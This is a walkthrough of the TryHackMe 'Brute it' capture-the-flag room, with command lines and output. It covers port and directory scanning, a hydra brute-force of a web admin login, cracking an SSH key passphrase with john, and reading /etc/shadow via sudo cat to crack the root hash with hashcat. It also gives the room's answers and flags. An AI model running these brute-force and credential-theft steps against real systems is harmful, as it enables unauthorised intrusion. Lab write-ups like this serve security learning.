TryHackMe | Brute it writeup
This is one (of many) walkthrough for the Brute it CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws from this article.
Reconnaissance
As usual, I use nmap to see which ports are open.
nmap -sC -SV $IP-ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-01-11 17:26 GMT
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:A2:02:F1:92:0F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds- How many ports are open? 2
2. What version of SSH is running? OpenSSH 7.6p1
3. What version of Apache is running? 2.4.29
4. Which Linux distribution is running? Ubuntu
After accessing the web server on a browser, I could not find any potential answers for the next question. So, I tried to use gobuster to brute force some URIs.
gobuster dir -u http://IP_ADDRESS -x html,py,txt,php,css -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://IP_ADDRESS
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,py,txt,php,css
[+] Timeout: 10s
===============================================================
2023/01/11 17:29:01 Starting gobuster
===============================================================
...
/admin (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/01/11 17:29:04 Finished
===============================================================5. What is the hidden directory? /admin
Getting a shell
After accessing the /admin, I could see an administrator login panel asking for some credentials. By inspecting the HTML source code I found some goodies! 😺
Based on the hint of the next question and this information, I had all information to brute-force the password. This required a bit of research as I was not aware of the type of hydra service required. I found that the service needed was http-post-form. Some of the elements needed for the http-post-form services included the endpoint to perform the authentication, but also the error message to compare the results.
With no further due, the command execute was the following one:
hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV $IP_ADDRESS http-post-form "/admin/:user=admin&pass=^PASS^:invalid"
...
[VERBOSE] Page redirected to http://10.10.203.245/admin/panel/
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "disney" - 523 of 14344398 [child 0] (0/0)
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "rabbit" - 524 of 14344398 [child 7] (0/0)
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "54321" - 525 of 14344398 [child 13] (0/0)
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "fashion" - 526 of 14344398 [child 14] (0/0)
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "soccer1" - 527 of 14344398 [child 15] (0/0)
[80][http-post-form] host: $IP_ADDRESS login: admin password: xavier6. What is the user:password of the admin panel? admin:xavier
After signing in on the administrator panel, a web flag and a username stand out on the screen. Quickly answered that one! 😄
The admin panel was also pointing out an id_rsa private key. The next question required a bit more steps. Thankfully, THM allowed me to learn a bit more about password cracking. john is an awesome tool for the job. Additionally, ssh2john allowed me to convert the private key to a john format.
$ curl http://IP_ADDRESS/admin/panel/id_rsa > id_rsa
$ /opt/john/ssh2john.py id_rsa > hash
$ john hash --wordlist=/usr/share/wordlists/rockyou.txtWait some seconds to see the passphrase that will be used in the next question
7. Crack the RSA key you found. What is John’s RSA Private Key passphrase? rockinroll
You can now access the server through ssh. Remember that you need to give just enough permissions of the private key.
$ chmod 600 id_rsa
$ ssh -i id_rsa john@IP_ADDRESS
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Jan 11 18:13:58 UTC 2023
System load: 0.0 Processes: 104
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 20% IP address for eth0: 10.10.203.245
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
john@bruteit:~$8. user.txt THM{a_password_is_not_a_barrier}
9. Web flag THM{brut3_f0rce_is_e4sy}
Privilege Escalation
The remaining of the CTF introduced some new challenges. The very first thing to do was to list the commands I was allowed to execute on behalf of john.
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/catAt this point, we can read the contents of any file as we are able to run cat as root. With that in mind, let’s try to read the content of the /etc/shadow file
sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
...We can copy the hash content from $6$ until the next “:” and try to hash it. This time, I used hashcat
$ hashcat -a 0 -m 1800 hash /usr/share/wordlists/rockyou.txt
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 2 secs
$6$zdk0.:football
...more-hashcat-ouput10. Find a form to escalate your privileges. What is the root’s password? football
Well, nothing extra to say. We can change the user to root and extract the final piece of the puzzle.
$ su root
Password: football
root@bruteit:/bin# whoami
rootYou can access the root folder and see the final flag.
11. root.txt THM{pr1v1l3g3_3sc4l4t10n}
Conclusion
Pretty cool this, to be honest! Was really great to try different tools to crack the passwords (hydra, john, hashcat). Kudos to ReddyyZ to create this one! 👍
